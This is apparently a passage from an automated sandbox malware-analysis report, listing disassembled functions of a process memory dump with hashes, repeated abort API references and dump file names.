Instruction ID: 0bf848ef53bd94b3caddefb081e98907697b35c1c769ce642c864c1567630d58
Opcode Fuzzy Hash: 4745bfb8e163a2e76a714115fd548839a3770c52929cf19a77cb37e4562bbd54
Instruction Fuzzy Hash: 9DF030B19052118BD704EF29C1A4B6AB771FF02308F159A48C4559BB06DB35E4ADCFD1

Function 6CA2B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 24d33de93a18e28bc31f528641f9fc14ef9e261e35b9fa38d82a4faaecfbb120
Instruction ID: 73caae7023536dfc7b30c70d2740d22df1c45654dcdf1e0926fbe8978eb61dcb
Opcode Fuzzy Hash: 24d33de93a18e28bc31f528641f9fc14ef9e261e35b9fa38d82a4faaecfbb120
Instruction Fuzzy Hash: B4312930609B2C9FC300CE99D491356B7E2EB45314F4C8B29EAA687B42D338DCD5EB51

Function 6CA2BFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 71616eae3c8925a4767f6a0f7849bf2bcbdb20af23ce81657869416fa6e7e1c1
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: D6F05C309CC03A8B93102B2D50308E1B3337B8B30CB9D1641E8926BF28C729D8C7C351

Function 6CA2BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9247e08a2de9a72e93f6273ad16a092db05612d4d246c5c971058df1498dbd2c
Instruction ID: 4b382957e178347ed7a9cca54b14941adb8b7ca0f56894b013ffe2cbe483fab9
Opcode Fuzzy Hash: 9247e08a2de9a72e93f6273ad16a092db05612d4d246c5c971058df1498dbd2c
Instruction Fuzzy Hash: 6B016D73A05A7607D3144E75C4E1361B6A25F82318F1D8769CD7717F8AC63CE889E750

Function 6CA2BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: d18a5071d0d21e670726baf42dc4c3d1acd5a7f65bf0196e3bc477a792ca046b
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: E5E08C32A4A33D4B861069ACB6501BAB2549B42358F192E28D919A3E04D756E8CD82C2

Function 6CA2BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: a208aa4f514742dada0a88ba3cda8218b9dcd95189f49939fa41aefd3c662abb
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 17D05E3094D13B4B8B045E2952A88A9F2B66B4630871E6A94D409E3A05DB21EA8E8604

Function 6CA2BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 80f5e825f0729690f7868c692f992e04926b91d2cec88c353d55b7f4222be55e
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 6ED05E3058972D8F8300EF18D2A48B9F7F5AF4B305B05AE69C409D7F24DB36D889CA01

Function 6CA2BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 30581f2e97d4605316e74d0d6c212a643e1045fed7cfacb1e4122dd4d059169f
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 7BC01231D8933D4BC2102DA911607B6F2A59B07204F1A3D188D5973F00CF65EC8A8545

Function 6CA2BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D03
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D08
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D12
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D17
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D21
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D26
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D30
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D35
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6CA2C5DB), ref: 6CAF6D44
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D4C
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D51
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D56
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D5B
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
